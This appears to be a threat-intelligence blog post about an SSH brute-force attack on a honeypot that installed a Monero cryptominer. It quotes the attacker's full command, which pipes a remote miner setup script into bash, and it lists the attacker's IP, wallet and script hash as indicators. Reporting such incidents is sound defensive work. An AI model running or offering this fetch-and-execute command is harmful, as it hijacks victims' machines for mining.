January 23 - US honeypot: brute-force attack to load a Monero miner ??

On January 4th, at 00:47, Z, attacker using IP address 89.44.9[.]225 brute-forced an account on an Eastern US honeypot using SSH protocol. After a few unsuccessful attempts, they managed to get credentials and then they ran the following command lines:

curl -s -L

http[:]//download[.]c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 89p8myXNvbHLadTsifZ9aMWSM643faM1gWDXkjZMecHMcrp74t9NHKfBzrBGjDqYyH9CTiuegwnfyeoGpz7itBkx8Mst3X4 &

The Shell script setup_c3pool_miner.sh that the attacker attempts to download corresponds to sha256 0bade474b812222dbb9114125465f9dd558e6368f155a6cd20ca352ddd20549e which is a Linux miner known from the cybersecurity community and flagged as malicious on public database.

More broadly, C3Pool is a Monero mining pool. The website is in Chinese and English and asks specifically to ensure that the use of their platform is made a “in compliance with laws, regulations and relevant policies in my country or region.”

Automatic Translation: I hereby confirm and affirm that I am not a resident of Cuba, Iran, North Korea, Syria or any other country or region subject to sanctions administered or enforced by the relevant country or government or international agency, and that the mining pool services provided by StarMap are in compliance with laws, regulations and relevant policies in my country or region.

?

The attacker’s goal is to use the resources of the targeted device to mine cryptocurrency and transfer it to their Monero wallet (possibly the strings in the command line composed of 95 characters, which is the same format as Monero wallets).

?

This kind of attacks is not stealth as it will usually consume hardware resources, so that the related compromised box might not be able to work properly. But as the cloud is more and more used, we see an increase of risks as companies sometimes don’t have the time to check the security of the cloud workload, or to check what is happening.

?

It’s also interesting to see that criminals are trying to find the best way to earn money. It’s a kind of exploration. They try to find their “market” by checking what will give them as much as they can. Of course, ransomwares are still the main source of security issues, compared to mining.

?

IP address 89.44.9[.]225 (FR - AS 9009 - M247 Europe SRL) has been tagged as malicious on public database, including for SSH brute-forcing.

?